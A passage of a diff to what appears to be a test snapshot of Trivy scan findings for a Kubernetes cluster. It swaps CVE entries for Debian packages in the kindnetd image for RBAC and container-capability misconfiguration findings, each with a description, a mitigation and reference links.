"Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://github.com/andk/cpanpm/pull/175", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://metacpan.org/dist/CPAN/changes", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-1", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system:controller:bootstrap-signer' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=kube-public&Kind=Role&Name=system:controller:bootstrap-signer", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'system:controller:bootstrap-signer' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-2", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-4116", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", + "foundIn": "Target: 'Role/system::leader-locking-kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.openwall.com/lists/oss-security/2011/11/04/2", - "http://www.openwall.com/lists/oss-security/2011/11/04/4", - "https://access.redhat.com/security/cve/CVE-2011-4116", - "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", - "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", - "https://rt.cpan.org/Public/Bug/Display.html?id=69106", - "https://seclists.org/oss-sec/2011/q4/238", - "https://www.cve.org/CVERecord?id=CVE-2011-4116", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", ], }, - "category": "Vulnerability", - "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "perl: File::Temp insecure temporary file handling", + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system::leader-locking-kube-controller-manager", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'system::leader-locking-kube-controller-manager' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-4116", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system::leader-locking-kube-scheduler' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system::leader-locking-kube-scheduler", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'system::leader-locking-kube-scheduler' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2011-4116", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system:controller:bootstrap-signer' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:bootstrap-signer", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system:controller:cloud-provider' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:cloud-provider", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'system:controller:cloud-provider' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://seclists.org/oss-sec/2011/q4/238", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31486", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", + "foundIn": "Target: 'Role/system:controller:token-cleaner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://hackeriet.github.io/cpan-http-tiny-overview/", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", - "https://www.openwall.com/lists/oss-security/2023/05/03/4", - "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", ], }, - "category": "Vulnerability", - "description": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standa ...", + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:token-cleaner", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31486", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Role&Name=kubernetes-dashboard", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Role&Name=kubernetes-dashboard", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'kubernetes-dashboard' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/leader-election-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Role&Name=leader-election-role", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'leader-election-role' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/cluster-admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV044", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv044", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits wildcard verb on wildcard resource", + "location": "scb://trivy/?Kind=ClusterRole&Name=cluster-admin", + "mitigation": "Create a role which does not permit wildcard verb on wildcard resource", + "name": "No wildcard verb and resource roles(Role permits wildcard verb on wildcard resource)", + "references": [ { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "value": "https://avd.aquasec.com/misconfig/ksv044", }, { "type": "URL", - "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2005-2541", - "installedVersion": "1.34+dfsg-1", - "packageName": "tar", + "foundIn": "Target: 'ClusterRole/cluster-admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV046", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://marc.info/?l=bugtraq&m=112327628230258&w=2", - "https://access.redhat.com/security/cve/CVE-2005-2541", - "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", - "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv046", ], }, - "category": "Vulnerability", - "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "tar: does not properly warn the user when extracting setuid or setgid files", + "category": "Misconfiguration", + "description": "Check whether role permits specific verb on wildcard resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=cluster-admin", + "mitigation": "Create a role which does not permit specific verb on wildcard resources", + "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2005-2541", + "value": "https://avd.aquasec.com/misconfig/ksv046", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2005-2541", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-48303", - "installedVersion": "1.34+dfsg-1", - "packageName": "tar", + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/errata/RHSA-2023:0959", - "https://access.redhat.com/security/cve/CVE-2022-48303", - "https://bugzilla.redhat.com/2149722", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", - "https://errata.almalinux.org/9/ALSA-2023-0959.html", - "https://errata.rockylinux.org/RLSA-2023:0959", - "https://linux.oracle.com/cve/CVE-2022-48303.html", - "https://linux.oracle.com/errata/ELSA-2023-0959.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", - "https://savannah.gnu.org/bugs/?62387", - "https://savannah.gnu.org/patch/?10307", - "https://ubuntu.com/security/notices/USN-5900-1", - "https://ubuntu.com/security/notices/USN-5900-2", - "https://www.cve.org/CVERecord?id=CVE-2022-48303", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", ], }, - "category": "Vulnerability", - "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-48303", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0959", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-48303", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149722", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0959", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(ClusterRole 'admin' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV050", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv050", + ], + }, + "category": "Misconfiguration", + "description": "An effective level of access equivalent to cluster-admin should not be provided.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", + "name": "Do not allow management of RBAC resources(ClusterRole 'admin' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "value": "https://avd.aquasec.com/misconfig/ksv050", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://savannah.gnu.org/bugs/?62387", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://savannah.gnu.org/patch/?10307", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-1", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-2", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - 